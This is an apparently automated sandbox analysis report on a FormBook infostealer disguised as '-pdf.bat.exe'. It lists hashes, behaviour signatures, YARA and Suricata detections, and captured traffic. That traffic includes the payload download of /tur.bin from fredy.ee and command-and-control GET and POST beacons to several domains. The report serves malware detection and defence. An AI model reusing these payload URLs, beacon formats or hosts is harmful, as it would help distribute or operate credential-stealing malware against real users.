Windows Analysis Report
-pdf.bat.exe

Overview

General Information

Sample name: -pdf.bat.exe
Analysis ID: 1525408
MD5: 2a19eac38990809a62213e2b89be0f60
SHA1: 99d231bc3c54c0d29469c97c4987329fd523fe20
SHA256: d322df678d8d8b40b30c463a51395a961b0a703a01523d6def82a4679b5729a6

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • -pdf.bat.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\-pdf.bat.exe" MD5: 2A19EAC38990809A62213E2B89BE0F60)
    • -pdf.bat.exe (PID: 2236 cmdline: "C:\Users\user\Desktop\-pdf.bat.exe" MD5: 2A19EAC38990809A62213E2B89BE0F60)
      • ijDRAEBvXKu.exe (PID: 4180 cmdline: "C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ipconfig.exe (PID: 7956 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
  • 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  • 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
  • 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
No Sigma rule has matched

        AV Detection

        Source: platinumkitchens.info, Virustotal: Detection: 9%
        Source: tempatmudisini01.click, Virustotal: Detection: 12%
        Source: www.tempatmudisini01.click, Virustotal: Detection: 8%
        Source: -pdf.bat.exe, ReversingLabs: Detection: 23%
        Source: -pdf.bat.exe, Virustotal: Detection: 26%
        Source: Yara match, File source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: -pdf.bat.exe, Joe Sandbox ML: detected
        Source: -pdf.bat.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 185.86.211.136:443 -> 192.168.11.20:49728 version: TLS 1.2
        Source: -pdf.bat.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ijDRAEBvXKu.exe, 00000003.00000002.42752421981.000000000050E000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: -pdf.bat.exe, -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\-pdf.bat.exe, Code function: 0_2_0040682E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_0040682E
        Source: C:\Users\user\Desktop\-pdf.bat.exe, Code function: 0_2_004066E4 FindFirstFileW,FindClose, 0_2_004066E4
        Source: C:\Users\user\Desktop\-pdf.bat.exe, Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe, Code function: 4x nop then xor eax, eax, 3_2_0103490B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe, Code function: 4x nop then pop edi, 3_2_0103FF1E

        Networking

        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 38.47.207.146:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 103.21.221.4:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 54.67.87.110:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 103.21.221.4:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 137.175.33.56:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49763 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49775 -> 103.21.221.4:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 103.21.221.4:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49803 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49803 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 194.58.112.174:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 54.67.87.110:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49811 -> 194.58.112.174:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 194.58.112.174:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49807 -> 54.67.87.110:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49783 -> 137.175.33.56:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49807 -> 54.67.87.110:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49783 -> 137.175.33.56:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49815 -> 38.47.207.146:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 38.47.207.146:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 38.47.207.146:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49791 -> 13.248.169.48:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49791 -> 13.248.169.48:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49823 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49823 -> 162.213.249.216:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 38.47.207.146:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49819 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 3.33.130.190:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 84.32.84.32:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 13.248.169.48:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 84.32.84.32:80
        Source: DNS query: www.ngmr.xyz
        Source: Joe Sandbox View, IP Address: 103.21.221.4
        Source: Joe Sandbox View, IP Address: 13.248.169.48
        Source: Joe Sandbox View, ASN Name: LINKNET-ID-APLinknetASNID
        Source: Joe Sandbox View, ASN Name: PEGTECHINCUS
        Source: Joe Sandbox View, ASN Name: AMAZON-02US
        Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49727 -> 185.86.211.136:80
        Source: global traffic, HTTP traffic detected: GET /tur.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Cache-Control: no-cache
            Host: fredy.ee
            Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /tur.bin HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: fredy.ee
            Cache-Control: no-cache
        Source: global traffic, HTTP traffic detected: GET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.invicta.world
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /bqye/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.whats-in-the-box.org
            Origin: http://www.whats-in-the-box.org
            Referer: http://www.whats-in-the-box.org/bqye/
            Content-Length: 199
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /bqye/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.whats-in-the-box.org
            Origin: http://www.whats-in-the-box.org
            Referer: http://www.whats-in-the-box.org/bqye/
            Content-Length: 219
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /bqye/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.whats-in-the-box.org
            Origin: http://www.whats-in-the-box.org
            Referer: http://www.whats-in-the-box.org/bqye/
            Content-Length: 7367
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.whats-in-the-box.org
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /was5/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.linkwave.cloud
            Origin: http://www.linkwave.cloud
            Referer: http://www.linkwave.cloud/was5/
            Content-Length: 199
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /was5/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.linkwave.cloud
            Origin: http://www.linkwave.cloud
            Referer: http://www.linkwave.cloud/was5/
            Content-Length: 219
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /was5/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.linkwave.cloud
            Origin: http://www.linkwave.cloud
            Referer: http://www.linkwave.cloud/was5/
            Content-Length: 7367
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.linkwave.cloud
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /7k8f/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.dfmagazine.shop
            Origin: http://www.dfmagazine.shop
            Referer: http://www.dfmagazine.shop/7k8f/
            Content-Length: 199
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /7k8f/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.dfmagazine.shop
            Origin: http://www.dfmagazine.shop
            Referer: http://www.dfmagazine.shop/7k8f/
            Content-Length: 219
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: POST /7k8f/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            Host: www.dfmagazine.shop
            Origin: http://www.dfmagazine.shop
            Referer: http://www.dfmagazine.shop/7k8f/
            Content-Length: 7367
            Cache-Control: max-age=0
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Accept-Language: en-US,en;q=0.9
            Host: www.dfmagazine.shop
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
